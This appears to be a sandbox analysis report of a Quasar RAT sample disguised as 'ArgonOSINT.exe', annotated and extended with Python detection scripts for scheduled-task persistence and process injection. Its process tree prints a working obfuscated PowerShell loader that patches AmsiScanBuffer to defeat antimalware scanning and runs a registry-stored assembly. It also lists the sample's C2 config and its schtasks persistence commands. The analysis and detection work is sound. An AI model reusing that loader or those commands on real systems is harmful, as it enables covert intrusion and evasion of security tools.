Analysis
  max time kernel: 12s
  max time network: 17s
  platform: windows10-1703_x64
  resource: win10-20240404-en
  resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  submitted: 04-05-2024 15:55
General
  Target: ArgonOSINT.exe
  Size: 409KB
  MD5: c4f70954d48c8653fde31fc63c619fc8
  SHA1: c2fe0bc4eab66f6cbf19ab3a80817eba8084982e
  SHA256: dbc30b002dad39a45fdd36c509d854dc931662235886f01ec149cd8cf904ddb5
  SHA512: 1a0db425192d25f1e96ac43a5ae18ff530ef11e2f1526fd6677f4b82b04e212679c347f5647be0d72665e2f587c2824b19d2104c48546eb049ae27fb7470defc
  SSDEEP: 12288:UpyJcC+x6AoV5l+6KprKF/UV6u4W0pDs:kwd+mDsV6u4g
Malware Config
Extracted
  Family: quasar
  Version: 3.1.5
  Botnet (tag): Slave
  C2: even-lemon.gl.at.ply.gg:33587
  Mutex: $Sxr-3vDee7FzoJnhqjuE3n
  encryption_key: BfQu2aop09VkjugTkmuc
  install_name: $sxr-powershell.exe
  log_directory: Logs
  reconnect_delay: 1000
  startup_key: $sxr-powershell
  subdirectory: Windows

  The labels for the first five fields were lost in extraction and are restored here from the standard layout of the extractor's Quasar output (family, version, botnet tag, C2, mutex); the remaining keys are as extracted. The C2 is a *.ply.gg hostname, i.e. a playit.gg tunnel endpoint, which is what the "Legitimate hosting services abused" signature below refers to. install_name and subdirectory together give the drop path seen in the YARA hit and in Downloads, %APPDATA%\Windows\$sxr-powershell.exe, and startup_key is the scheduled-task name used by the schtasks calls in the process tree.
Signatures

Quasar payload (2 IoCs)
  resource | yara_rule
  behavioral1/memory/4596-1-0x0000000000A20000-0x0000000000A8C000-memory.dmp | family_quasar
  C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe | family_quasar
  (PID 4596 is ArgonOSINT.exe itself; the second hit is the on-disk copy it drops, listed under Downloads.)

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description | pid | process | target process
  PID 2524 created 576 | 2524 | powershell.EXE | winlogon.exe
  A process was created with an explicit parent handle: powershell.EXE (2524) named winlogon.exe (576) as the parent of the new process. Read together with the SetThreadContext and WriteProcessMemory entries below (2524 -> dllhost.exe 3468) and the process tree, where dllhost.exe sits under winlogon.exe, this is parent-PID spoofing followed by hollowing of dllhost.exe.

Downloads MZ/PE file
  (no rows captured)

Executes dropped EXE (2 IoCs)
  pid | process
  2000 | $sxr-powershell.exe
  3400 | install.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  (rows not captured; the C2 host in the extracted config, even-lemon.gl.at.ply.gg, is a playit.gg tunnel hostname)

Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  1 | ip-api.com

Drops file in System32 directory (3 IoCs)
  description | ioc | process
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx | svchost.exe
  The systemprofile paths show powershell.EXE running as LocalSystem, consistent with its position under the Schedule service host in the process tree. The .evtx modification is the EventLog service writing its own log.

Suspicious use of SetThreadContext (1 IoC)
  description | pid | process | target process
  PID 2524 set thread context of 3468 | 2524 | powershell.EXE | dllhost.exe
  Writing into a newly created process and then setting its main thread context is the process-hollowing sequence; the matching writes are in the WriteProcessMemory table.

Drops file in Windows directory (2 IoCs)
  description | ioc | process
  File created | C:\Windows\rescache\_merged\4129138312\2337188909.pri | RuntimeBroker.exe
  File created | C:\Windows\rescache\_merged\3060194815\1209253612.pri | RuntimeBroker.exe

Checks SCSI registry key(s) (3 TTPs, 8 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  All eight entries are by RuntimeBroker.exe:
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\HardwareID
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002
  Caveat: every hit comes from RuntimeBroker.exe (3980), a system process that is not a child of the sample and does not appear as a WriteProcessMemory target, so this is environment noise rather than evidence that the sample fingerprints the VM (the QEMU device names do show the analysis host is a QEMU guest).

Creates scheduled task(s) (1 TTP, 3 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | process
  4980 | SCHTASKS.exe
  3056 | schtasks.exe
  3704 | schtasks.exe
  (The full command lines are in the process tree: two registrations of "$sxr-powershell" and one of "$77ArgonOSINT.exe", all with /sc ONLOGON and /rl HIGHEST.)
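The three schtasks /create invocations recorded in the process tree share the same properties in different combinations: a logon trigger, /rl HIGHEST, and a /tr target under the user's AppData. Note also that "$sxr-powershell" is registered twice with /f: first by ArgonOSINT.exe pointing at its own Temp path, then by the dropped Roaming copy, so the task ends up pointing at the persistent copy. The following Python is an added example, not part of the report: a small triage check that parses such command lines and lists the properties that make each one suspicious. The sample lines are constructed from the three invocations in the report plus one benign control line; the user-writable directory list and the '$' task-name-prefix check are choices made for this example, the latter specific to the naming seen in this sample.

```python
import re

# Constructed sample: the three schtasks command lines from the report's process tree,
# plus one benign control line invented for contrast.
SAMPLE_CMDLINES = [
    r'''"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe" /rl HIGHEST /f''',
    r'''"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe" /rl HIGHEST /f''',
    r'''"SCHTASKS.exe" /create /tn "$77ArgonOSINT.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe'" /sc onlogon /rl HIGHEST''',
    r'''"schtasks" /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Program Files\Backup\backup.exe"''',
]

# Directory fragments (lower-case, backslash-delimited) that an unprivileged user can write to.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\", "\\programdata\\")
LOGON_TRIGGERS = {"onlogon", "onstart"}
# Tokeniser: a double-quoted run (may contain spaces) or a bare non-space run.
TOKEN = re.compile(r'"[^"]*"|\S+')


def parse_schtasks(cmdline):
    """Turn a schtasks command line into {option: value}; flag-style options map to True."""
    tokens = [t.strip('"') for t in TOKEN.findall(cmdline)]
    opts = {}
    i = 1  # tokens[0] is the executable name
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            # An option followed by a non-option token takes that token as its value.
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[key] = tokens[i + 1]
                i += 2
                continue
            opts[key] = True
        i += 1
    return opts


def assess(cmdline):
    """Return the list of reasons a schtasks /create line looks like malware persistence."""
    opts = parse_schtasks(cmdline)
    reasons = []
    if "create" not in opts:
        return reasons
    sc = str(opts.get("sc", "")).lower()
    if sc in LOGON_TRIGGERS:
        reasons.append(f"/sc {sc}: re-runs at every logon/boot")
    if str(opts.get("rl", "")).lower() == "highest":
        reasons.append("/rl HIGHEST: task runs with the highest available token")
    # /tr may be wrapped in single quotes inside the double quotes, as in the third sample.
    tr = str(opts.get("tr", "")).strip("'").lower()
    if any(d in tr for d in USER_WRITABLE):
        reasons.append(f"/tr points into a user-writable directory: {tr}")
    tn = str(opts.get("tn", ""))
    if tn.startswith("$"):
        reasons.append(f"task name {tn!r} uses the '$' prefix seen in this sample")
    return reasons


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        hits = assess(line)
        print(f"{len(hits)} finding(s): {line}")
        for h in hits:
            print("   -", h)
```

Run against the constructed lines, each of the three lines from the report scores four findings and the control line scores none. In a real pipeline the same parser can be fed the CommandLine field of Sysmon event 1 or Security event 4688 for schtasks.exe, or the task XML under C:\Windows\System32\Tasks, where the same fields (trigger, RunLevel, Command) are available in structured form.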
Modifies data under HKEY_USERS (42 IoCs)
  All 42 entries are by powershell.EXE (2524) under \REGISTRY\USER\.DEFAULT, the hive of the LocalSystem account.
  Key created under \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ (24):
    Root, Root\Certificates, Root\CRLs, Root\CTLs,
    CA, CA\Certificates, CA\CRLs, CA\CTLs,
    Disallowed, Disallowed\Certificates, Disallowed\CRLs, Disallowed\CTLs,
    TrustedPeople, TrustedPeople\Certificates, TrustedPeople\CRLs, TrustedPeople\CTLs,
    SmartCardRoot, SmartCardRoot\Certificates, SmartCardRoot\CRLs, SmartCardRoot\CTLs,
    trust, trust\Certificates, trust\CRLs, trust\CTLs
  Key created under \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\ (16):
    CA, CA\Certificates, CA\CRLs, CA\CTLs,
    Disallowed, Disallowed\Certificates, Disallowed\CRLs, Disallowed\CTLs,
    TrustedPeople, TrustedPeople\Certificates, TrustedPeople\CRLs, TrustedPeople\CTLs,
    trust, trust\Certificates, trust\CRLs, trust\CTLs
  Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
  Set value (data): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 (UTF-16LE multi-string "en-US", "en")
  These are the per-account certificate-store and WinTrust keys that CryptoAPI creates the first time a process uses them under an account. They show that PowerShell ran as LocalSystem, the Task Scheduler context seen in the process tree, and that it loaded an assembly that went through signature/trust checks; they are not modifications of trust settings.

Modifies registry class (24 IoCs)
  All 24 entries are by RuntimeBroker.exe (3980) under \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache, the hive of the logged-on user.
  Key created: ImmutableMuiCache; ImmutableMuiCache\Strings; ImmutableMuiCache\Strings\52C64B7E
  Set value (data): Strings\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000
  Set value (str) under Strings\52C64B7E\ (resource reference = cached display string):
    @%SystemRoot%\system32\Vault.dll,-1#immutable1 = "Credential Manager"
    @%SystemRoot%\System32\mmsys.cpl,-300#immutable1 = "Sound"
    @%SystemRoot%\system32\FirewallControlPanel.dll,-12122#immutable1 = "Windows Firewall"
    @%SystemRoot%\System32\intl.cpl,-3#immutable1 = "Region"
    @%SystemRoot%\system32\colorcpl.exe,-6#immutable1 = "Color Management"
    @%SystemRoot%\System32\fhcpl.dll,-52#immutable1 = "File History"
    @%SystemRoot%\System32\telephon.cpl,-1#immutable1 = "Phone and Modem"
    @%SystemRoot%\System32\hgcpl.dll,-1#immutable1 = "HomeGroup"
    @%SystemRoot%\System32\main.cpl,-102#immutable1 = "Keyboard"
    @%SystemRoot%\System32\srchadmin.dll,-601#immutable1 = "Indexing Options"
    @%SystemRoot%\System32\SyncCenter.dll,-3000#immutable1 = "Sync Center"
    @%SystemRoot%\system32\inetcpl.cpl,-4312#immutable1 = "Internet Options"
    @%SystemRoot%\System32\SensorsCpl.dll,-1#immutable1 = "Location Settings"
    @%SystemRoot%\System32\sud.dll,-1#immutable1 = "Default Programs"
    @%SystemRoot%\system32\RADCUI.dll,-15300#immutable1 = "RemoteApp and Desktop Connections"
    @%SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Speech Recognition"
    @%SystemRoot%\System32\systemcpl.dll,-1#immutable1 = "System"
    @%SystemRoot%\System32\accessibilitycpl.dll,-10#immutable1 = "Ease of Access Center"
    @%SystemRoot%\System32\fvecpl.dll,-47#immutable1 = "Device Encryption"
    @%SystemRoot%\System32\recovery.dll,-101#immutable1 = "Recovery"
  This is the shell caching Control Panel display strings; it is ordinary RuntimeBroker activity, not something the sample does.

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | process | hits
  2524 | powershell.EXE | 4
  3468 | dllhost.exe | 60
  (64 is the report's display cap, so the true count may be higher.)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid | process
  3416 | Explorer.EXE

Suspicious use of AdjustPrivilegeToken (10 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 4596 | ArgonOSINT.exe
  Token: SeDebugPrivilege | 2524 | powershell.EXE
  Token: SeDebugPrivilege | 2000 | $sxr-powershell.exe
  Token: SeDebugPrivilege | 2524 | powershell.EXE
  Token: SeDebugPrivilege | 3468 | dllhost.exe
  Token: SeTakeOwnershipPrivilege | 3980 | RuntimeBroker.exe
  Token: SeRestorePrivilege | 3980 | RuntimeBroker.exe
  Token: SeShutdownPrivilege | 3416 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3416 | Explorer.EXE
  Token: SeManageVolumePrivilege | 4476 | DllHost.exe
  SeDebugPrivilege is the one that matters here: it is enabled by the sample, its dropped copy, the PowerShell stage and the hollowed dllhost.exe, and is what allows the later writes into protected processes such as lsass.exe.

Suspicious use of FindShellTrayWindow (3 IoCs)
  pid | process
  3416 | Explorer.EXE (3 hits)

Suspicious use of WriteProcessMemory (64 IoCs)
  source (pid, process) -> target (pid, process), with the number of recorded writes:
  4596 ArgonOSINT.exe -> 3704 schtasks.exe (3), 2000 $sxr-powershell.exe (3), 3400 install.exe (3), 4980 SCHTASKS.exe (3)
  2000 $sxr-powershell.exe -> 3056 schtasks.exe (3)
  2524 powershell.EXE -> 3468 dllhost.exe (8)
  3468 dllhost.exe -> one write into each of: 576 winlogon.exe, 652 lsass.exe, 736 svchost.exe, 928 svchost.exe, 1004 dwm.exe, 432 svchost.exe, 392 svchost.exe, 892 svchost.exe, 1096 svchost.exe, 1152 svchost.exe, 1176 svchost.exe, 1196 svchost.exe, 1208 svchost.exe, 1364 svchost.exe, 1404 svchost.exe, 1412 svchost.exe, 1456 svchost.exe, 1480 svchost.exe, 1572 svchost.exe, 1604 svchost.exe, 1620 svchost.exe, 1744 svchost.exe, 1752 svchost.exe, 1764 svchost.exe, 1808 svchost.exe, 1868 svchost.exe, 1960 spoolsv.exe, 2032 svchost.exe, 2224 svchost.exe, 2232 svchost.exe, 2248 svchost.exe, 2348 svchost.exe, 2388 svchost.exe, 2480 sysmon.exe, 2500 svchost.exe, 2516 svchost.exe, 2532 svchost.exe, 2604 svchost.exe, 3012 unsecapp.exe, 3044 sihost.exe, 3064 svchost.exe (41 targets)
  The three writes per child from ArgonOSINT.exe and $sxr-powershell.exe are the writes CreateProcess itself makes into a child while setting it up; the sandbox records them for every spawned process, so they carry no signal. The eight writes from powershell.EXE into dllhost.exe, followed by SetThreadContext, are the hollowing of dllhost.exe. The single write from the hollowed dllhost.exe into every other process on the system, lsass.exe, winlogon.exe and the sysmon.exe sensor included, is system-wide injection. The list stops at the report's 64-entry cap, so the target set may be incomplete.
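Raw WriteProcessMemory counts are a poor signal, as the table above shows: a parent writing into the child it is spawning looks the same as an injector in a flat count. What separates the sample's activity is fan-out (one source writing into many unrelated processes), the identity of the targets, and the mismatch between who created dllhost.exe according to the tree (winlogon.exe) and who wrote into it and set its thread context (powershell.EXE). The following Python is an added example, not code from the report or the sandbox: it parses rows in the report's own wording and applies those three checks. The row sample is a constructed subset of the table above; the SetThreadContext pair and the recorded parent are copied from the other signature tables and hard-coded so the example runs stand-alone, and the fan-out threshold and sensitive-process list are choices made for this example.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the "Suspicious use of WriteProcessMemory" rows,
# in the report's own wording (the real table has 64 rows).
SAMPLE_ROWS = [
    "PID 4596 wrote to memory of 3704 4596 ArgonOSINT.exe schtasks.exe",
    "PID 4596 wrote to memory of 2000 4596 ArgonOSINT.exe $sxr-powershell.exe",
    "PID 2524 wrote to memory of 3468 2524 powershell.EXE dllhost.exe",
    "PID 2524 wrote to memory of 3468 2524 powershell.EXE dllhost.exe",
    "PID 3468 wrote to memory of 576 3468 dllhost.exe winlogon.exe",
    "PID 3468 wrote to memory of 652 3468 dllhost.exe lsass.exe",
    "PID 3468 wrote to memory of 736 3468 dllhost.exe svchost.exe",
    "PID 3468 wrote to memory of 1004 3468 dllhost.exe dwm.exe",
    "PID 3468 wrote to memory of 2480 3468 dllhost.exe sysmon.exe",
]
# Facts copied from the other signature tables, hard-coded to keep the example self-contained.
SET_THREAD_CONTEXT = {(2524, 3468)}   # "PID 2524 set thread context of 3468"
RECORDED_PARENT = {3468: 576}         # process tree: dllhost.exe is listed under winlogon.exe (576)

ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) \1 (\S+) (\S+)$")
# Processes a legitimate program has no business writing into (example choice).
SENSITIVE = {"lsass.exe", "winlogon.exe", "csrss.exe", "services.exe", "sysmon.exe"}
FANOUT_THRESHOLD = 4  # distinct targets; a parent spawning a few children stays below this


def parse_rows(rows):
    """Return (src_pid, src_image, dst_pid, dst_image) tuples; rows that do not match are skipped."""
    events = []
    for row in rows:
        m = ROW.match(row.strip())
        if m:
            events.append((int(m.group(1)), m.group(3), int(m.group(2)), m.group(4)))
    return events


def flag_writers(events, threshold=FANOUT_THRESHOLD):
    """Flag source processes by fan-out or by writing into a sensitive target."""
    targets = defaultdict(dict)  # src pid -> {dst pid: dst image}
    images = {}
    for src, src_img, dst, dst_img in events:
        targets[src][dst] = dst_img
        images[src] = src_img
    findings = {}
    for src, dsts in targets.items():
        sensitive = sorted({img.lower() for img in dsts.values() if img.lower() in SENSITIVE})
        if len(dsts) >= threshold or sensitive:
            findings[src] = {"image": images[src], "distinct_targets": len(dsts), "sensitive": sensitive}
    return findings


def hollowing_candidates(events, thread_ctx=SET_THREAD_CONTEXT, parents=RECORDED_PARENT):
    """A writer that also set the target's thread context, while the tree records a different parent,
    is the parent-PID-spoofing plus hollowing pattern."""
    out, seen = [], set()
    for src, _src_img, dst, dst_img in events:
        if (src, dst) in thread_ctx and (src, dst) not in seen:
            seen.add((src, dst))
            recorded = parents.get(dst)
            if recorded is not None and recorded != src:
                out.append({"writer": src, "target": dst, "target_image": dst_img, "recorded_parent": recorded})
    return out


if __name__ == "__main__":
    ev = parse_rows(SAMPLE_ROWS)
    for pid, f in flag_writers(ev).items():
        print(f"writer {pid} {f['image']}: {f['distinct_targets']} targets, sensitive={f['sensitive']}")
    for c in hollowing_candidates(ev):
        print(f"hollowing candidate: {c['writer']} -> {c['target']} ({c['target_image']}), "
              f"tree parent is {c['recorded_parent']}")
```

On the sample rows only dllhost.exe (3468) is flagged, for both fan-out and sensitive targets, ArgonOSINT.exe's writes into its own children fall below the threshold, and powershell.EXE -> dllhost.exe is reported as a hollowing candidate because the tree names winlogon.exe as dllhost's parent. With Sysmon data the equivalent inputs are event 10 (ProcessAccess with write rights) and event 1 (ParentProcessId); Sysmon has no direct SetThreadContext event, so the thread-context pair would come from a sandbox or EDR telemetry instead.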
Processes

Indentation reproduces the parent/child relation recorded by the sandbox. Each entry is the command line; the image path is given in parentheses only where it differs from the command line. PIDs in square brackets are taken from the signature tables above where a process can be matched to one.

winlogon.exe  (image: C:\Windows\system32\winlogon.exe)  [PID 576]
    "dwm.exe"  (image: C:\Windows\system32\dwm.exe)  [PID 1004]
    C:\Windows\System32\dllhost.exe /Processid:{b4eb1993-0b01-467a-a9ce-1fec32688fe3}  [PID 3468]
        flags: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        (created by powershell.EXE 2524 with winlogon.exe as the declared parent, then hollowed: see the NtCreateUserProcessOtherParentProcess and SetThreadContext entries above; it is the process that writes into every other process)
C:\Windows\system32\lsass.exe  [PID 652]
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}  (image: c:\windows\system32\taskhostw.exe)
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yIhBxOVWaPaP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gXFFKgMABqLmSh,[Parameter(Position=1)][Type]$wshtlkzLKc)$kgRVjzGtoaT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+'t'+''+'e'+'dD'+[Char](101)+''+[Char](108)+''+'e'+''+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+'d'+'ule',$False).DefineType('M'+'y'+'D'+'e'+'l'+[Char](101)+'gat'+[Char](101)+'T'+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$kgRVjzGtoaT.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+'lN'+[Char](97)+''+'m'+'e'+[Char](44)+'Hid'+'e'+''+'B'+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$gXFFKgMABqLmSh).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+'nag'+[Char](101)+''+[Char](100)+'');$kgRVjzGtoaT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+','+''+[Char](72)+''+'i'+''+'d'+'e'+'B'+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+'w'+''+'S'+''+[Char](108)+''+'o'+''+'t'+''+[Char](44)+'Vi'+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$wshtlkzLKc,$gXFFKgMABqLmSh).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'i'+'m'+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $kgRVjzGtoaT.CreateType();}$BqRVtcrDsYjVC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+'m'+'.'+'d'+''+'l'+'l')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'in'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+'e'+[Char](77)+'e'+'t'+'h'+[Char](111)+''+'d'+'s');$LrmnudhkbWtJVp=$BqRVtcrDsYjVC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+'roc'+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+''+'t'+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HrCzjRVOLHrIiaqSNGf=yIhBxOVWaPaP @([String])([IntPtr]);$RPiWTTDMJWmixFOhIbarIH=yIhBxOVWaPaP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UJmopAAFAmo=$BqRVtcrDsYjVC.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+'le').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$gRNAsVwXkapNqV=$LrmnudhkbWtJVp.Invoke($Null,@([Object]$UJmopAAFAmo,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+'b'+''+'r'+''+'a'+''+[Char](114)+'yA')));$RkyKQXcQErvRYAmWy=$LrmnudhkbWtJVp.Invoke($Null,@([Object]$UJmopAAFAmo,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+'ct')));$TXlMYGa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gRNAsVwXkapNqV,$HrCzjRVOLHrIiaqSNGf).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i.'+[Char](100)+''+'l'+''+'l'+'');$BizlGAzxknMzNcWBX=$LrmnudhkbWtJVp.Invoke($Null,@([Object]$TXlMYGa,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+'uf'+[Char](102)+'e'+[Char](114)+'')));$zMqDdSYUbf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RkyKQXcQErvRYAmWy,$RPiWTTDMJWmixFOhIbarIH).Invoke($BizlGAzxknMzNcWBX,[uint32]8,4,[ref]$zMqDdSYUbf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BizlGAzxknMzNcWBX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RkyKQXcQErvRYAmWy,$RPiWTTDMJWmixFOhIbarIH).Invoke($BizlGAzxknMzNcWBX,[uint32]8,0x20,[ref]$zMqDdSYUbf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TW'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"  [PID 2524]
        flags: Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in System32 directory; Suspicious use of SetThreadContext; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        (launched under the Task Scheduler service host, i.e. by a scheduled task, and therefore running as LocalSystem; the task that registers this command line is not one of the three schtasks invocations recorded below, which all point at ArgonOSINT.exe or $sxr-powershell.exe)
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
    flags: Drops file in System32 directory
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    sihost.exe  (image: c:\windows\system32\sihost.exe)  [PID 3044]
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
